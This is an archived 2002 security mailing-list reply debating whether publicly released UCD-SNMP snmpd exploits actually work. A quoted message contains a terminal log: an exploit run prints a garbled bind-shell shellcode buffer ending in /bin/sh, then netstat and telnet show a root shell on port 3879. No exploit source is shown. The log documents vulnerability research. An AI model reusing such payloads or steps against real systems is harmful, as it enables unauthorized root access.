Vulnerability Development mailing list archives
Re: snmpd exploit examination - snmpwalk
From: KF <dotslash () snosoft com>
Date: Thu, 21 Feb 2002 13:57:30 -0500
Don't get me wrong...I didn't say it couldn't be done... I have seen the results of a successful exploitation as well...I was in particular speaking about the questionable exploits that had been released to the lists...which happened to be dependant on snmpwalk. There was already claims of them being bunk made by someone else, I was just sharing my 2 cents on that particular subject.
-KF xbud wrote:
that's great.. but how would you explain a root shell sitting on a port i defined on an exploit i didn't release?note! I still haven't tested the "Zen-Parse" one . [root@dejaking /root]# snmpd [root@dejaking /root]# whereis snmpd snmpd: /usr/sbin/snmpd /usr/man/man1/snmpd.1.gz [root@dejaking /root]# ps -ef | grep snmpd root 15027 1 6 18:05 pts/2 00:00:00 snmpd root 15030 14973 0 18:05 pts/2 00:00:00 grep snmpd [root@dejaking /root]# gdb /usr/sbin/snmpd GNU gdb 19991004 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux"... (no debugging symbols found)... (gdb) at 15027 Attaching to program: /usr/sbin/snmpd, Pid 15027 Reading symbols from /usr/lib/libucdagent.so.0... (no debugging symbols found)...done.Reading symbols from /usr/lib/libucdmibs.so.0...(no debugging symbols found)...done. <snip> 0x4020c17e in __select () from /lib/libc.so.6 (gdb) c Continuing. Program received signal SIGTRAP, Trace/breakpoint trap. 0x40001990 in _start () at rtld.c:142 142 rtld.c: No such file or directory. (gdb) c Continuing. : command not found [xbud@dejaking xbud]$ ./ecksploit -20 sizeof(buffer) = 256 ret = 0xbfffd61cbuffer = Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿Öÿ¿?????????????????????????0/00å1Ò²f0/00Ð1É0/00ËC0/00]øC0/00]ôK0/00Mü?MôÍEUR1É0/00EôCf0/00]ìfÇEî'0/00Mð?Eì0/00 EøÆEü0/00Ð?MôÍEUR0/00ÐCCÍEUR0/00ÐCÍEUR0/00Ã1ɲ?0/00ÐÍEUR0/00ÐAÍEURë?^0/001À^F0/00E ° 0/00ó??U ÍEURèãÿÿÿ/bin/shÿ¿ Timeout: No Response from 127.0.0.1 [xbud@dejaking xbud]$ netstat -an --tcp Active Internet connections (servers and established) Proto Recv-Q Send-Q Local Address Foreign Address State tcp 0 0 0.0.0.0:3879 0.0.0.0:* LISTEN tcp 0 0 0.0.0.0:6011 0.0.0.0:* LISTEN tcp 0 0 xx.xx.xx.xx:22 24.28.xx.xx:64408 ESTABLISHED tcp 0 0 0.0.0.0:6010 0.0.0.0:* LISTEN tcp 0 0 xx.xx.xx.xx:22 24.28.xx.xx:64407 ESTABLISHED [xbud@dejaking xbud]$ telnet localhost 3879 Trying 127.0.0.1... Connected to localhost.localdomain (127.0.0.1). Escape character is '^]'. id;uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) pwd; /rootcheers, xbudtested on both 4.1.1 and 4.0.1 source and default install's. cheers On Wednesday 20 February 2002 03:14 pm, you wrote:
Current thread:
- snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk Syzop (Feb 21)
- Message not available
- Re: snmpd exploit examination - snmpwalk KF (Feb 21)
- Re: snmpd exploit examination - snmpwalk xbud (Feb 21)
- <Possible follow-ups>
- Re: snmpd exploit examination - snmpwalk The Itch (Feb 21)